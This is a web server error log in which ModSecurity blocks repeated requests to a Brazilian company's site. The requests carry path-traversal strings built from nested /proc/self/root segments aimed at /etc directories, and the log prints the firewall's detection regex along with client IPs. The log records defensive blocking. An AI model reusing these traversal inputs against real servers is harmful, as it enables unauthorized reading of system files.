"abq6PSmAPhZkrhU8w4l3jwAAAJY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:44:15.244253 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.243.128:38378] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq6P-oXxyEfFpUF8f93cwAAAVM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:44:19.871884 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.243.128:38380] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq6QgkwaGbbGflqUZAZ9QAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:44:25.972821 2026] [:error] [pid 11816:tid 140411725141760] [client 74.7.243.128:56444] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq6Sew_le52K8_3pV3pwwAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:44:28.067756 2026] [:error] [pid 29882:tid 140411658000128] [client 74.7.241.31:50864] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq6TEzinOy1jxa1j4cgcAAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 11:44:28.439036 2026] [:error] [pid 29882:tid 140411540502272] [client 74.7.243.128:56450] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq6TEzinOy1jxa1j4cgcQAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:45:56.331180 2026] [:error] [pid 15051:tid 140411632822016] [client 74.7.241.31:39298] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq6pCmAPhZkrhU8w4l4CQAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 11:47:11.000156 2026] [:error] [pid 11816:tid 140411607643904] [client 74.7.243.128:43114] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq67uw_le52K8_3pV3qIgAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:47:13.382262 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.243.128:33926] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq68eoXxyEfFpUF8f94TwAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:47:14.699054 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.243.128:33936] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq68gkwaGbbGflqUZAaRQAAAM0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:47:16.047042 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.243.128:33952] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq69AkwaGbbGflqUZAaRwAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:47:22.455075 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.243.128:33964] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq6-OyqAr6etmhZHNrNMAAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:47:41.423046 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.243.128:43790] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq7Dcdf6f5d65gmYZTfvgAAAso"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:47:44.561830 2026] [mime_magic:error] [pid 15051:tid 140411632822016] (70014)End of file found: [client 57.141.18.50:41280] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 11:47:47.231459 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.243.128:38068] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq7E8df6f5d65gmYZTfwwAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:47:48.537973 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.243.128:38072] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq7FOoXxyEfFpUF8f94ZgAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:47:52.185503 2026] [:error] [pid 30077:tid 140411624429312] [client 74.7.243.128:48166] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq7GPu8EFLIOrSqIpsOHQAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:48:04.968367 2026] [:error] [pid 15051:tid 140411548894976] [client 74.7.241.31:47440] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq7JCmAPhZkrhU8w4l4QgAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 11:48:19.766114 2026] [mime_magic:error] [pid 17887:tid 140411565680384] (70014)End of file found: [client 57.141.18.88:42256] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 11:48:51.175064 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.228.61:34330] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abq7Uta6ubjKNq_cu4am3wAAA0Q"]
[Wed Mar 18 11:48:51.176988 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.244.43:35792] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abq7Uvu8EFLIOrSqIpsOWgAAAkc"]
[Wed Mar 18 11:48:53.617468 2026] [:error] [pid 11816:tid 140411725141760] [client 74.7.241.31:47446] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq7Vew_le52K8_3pV3qbwAAAgI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 11:48:59.755032 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.241.31:39436] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq7WwkwaGbbGflqUZAaiQAAAMY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 11:49:04.631644 2026] [:error] [pid 19507:tid 140411624429312] [client 74.7.241.31:44386] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq7YNY0UrI5A3LftIy6NAAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 11:49:09.155520 2026] [:error] [pid 15051:tid 140411708356352] [client 74.7.241.31:44392] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq7ZSmAPhZkrhU8w4l4aQAAAIQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
